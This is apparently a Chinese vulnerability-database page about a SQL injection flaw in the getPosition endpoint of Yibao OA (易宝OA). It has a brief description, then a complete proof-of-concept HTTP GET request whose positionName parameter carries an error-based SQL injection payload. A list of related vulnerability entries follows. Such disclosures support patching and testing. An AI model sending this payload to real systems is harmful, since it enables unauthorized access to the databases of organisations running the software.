易宝OA getPosition SQL注入漏洞

日期: 2025-07-03 15:34:49 | 影响软件: 易宝OA | POC: 已公开

漏洞描述

SQL注入漏洞是指攻击者通过在Web应用程序的输入字段中插入恶意SQL代码，从而绕过应用程序的安全措施，直接对数据库执行非法操作。这种漏洞通常发生在应用程序未对用户输入进行充分验证和过滤的情况下，使得攻击者能够获取、修改或删除数据库中的数据，甚至可能执行服务器上的任意代码。

PoC代码

GET /SmartTradeScan/StockTake/getPosition?positionName=%27%20AND%202328%20IN%20(SELECT%20(CHAR(113)+CHAR(118)+CHAR(112)+CHAR(120)+CHAR(113)+(SELECT%20(CASE%20WHEN%20(2328=2328)%20THEN%20CHAR(49)%20ELSE%20CHAR(48)%20END))+CHAR(113)+CHAR(122)+CHAR(112)+CHAR(98)+CHAR(113)))%20AND%20%27EHJe%27=%27EHJe&stockRoomID=1&opeID=1&currentStatus=1&pickUpMode=11 HTTP/1.1
Host: 
Accept-Encoding: gzip, deflate, br
Accept: */*
Accept-Language: en-US;q=0.9,en;q=0.8
User-Agent: Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/134.0.0.0 Safari/537.36
Cache-Control: max-age=0

漏洞描述

PoC代码

相关漏洞推荐

易宝OA /SmartTradeScan/StockTake/getPosition SQL 注入漏洞 无POC

易宝OA-getPosition-存在sql注入漏洞 无POC

易宝OA GetUDEFStreamID SQL注入漏洞 无POC

yibao-oa-executesqlforsingle-sqli: 易宝OA系统ExecuteSqlForSingle接口存在SQL注入 POC

LemonLDAP::NG 操作系统命令注入漏洞 无POC

易宝OA /SmartTradeScan/StockTake/getPosition SQL 注入漏洞无POC

易宝OA-getPosition-存在sql注入漏洞无POC

易宝OA GetUDEFStreamID SQL注入漏洞无POC

LemonLDAP::NG 操作系统命令注入漏洞无POC